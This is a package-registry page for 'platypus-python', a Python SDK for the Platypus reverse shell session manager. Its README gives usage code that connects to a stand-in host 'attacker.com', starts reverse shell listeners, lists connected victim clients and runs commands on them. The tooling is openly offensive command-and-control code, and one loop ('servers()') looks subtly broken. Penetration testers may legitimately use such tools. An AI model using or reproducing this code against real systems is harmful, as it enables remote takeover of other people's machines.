🚀 Big News: Socket Acquires Coana to Bring Reachability Analysis to Every Appsec Team.Learn more

platypus-python

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

platypus-python

Python SDK for reverse shell sessions manager - Platypus v1.4.1

1.0.3
Maintainers
1

Platypus-Python

Python SDK for reverse shell sessions manager Platypus v1.3.1

Install

pip install platypus-python

Usage

Connect to Platypus endpoint

import platypus_python as pp

p = pp.Platypus("attacker.com", 7331)

Create a reverse shell server

server = p.create_server("0.0.0.0", 13339)

Stop a reverse shell server

server = servers[0]
server.delete()

Get all available listening servers

servers = p.get_servers()
for server in servers():
    print(server)

Get all online Clients of a server

server = servers[0]
clients = server.get_clients()
for client in clients:
    print(client)

Execute a command on a client

client = clients[0]
client.system("id")

FAQs

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts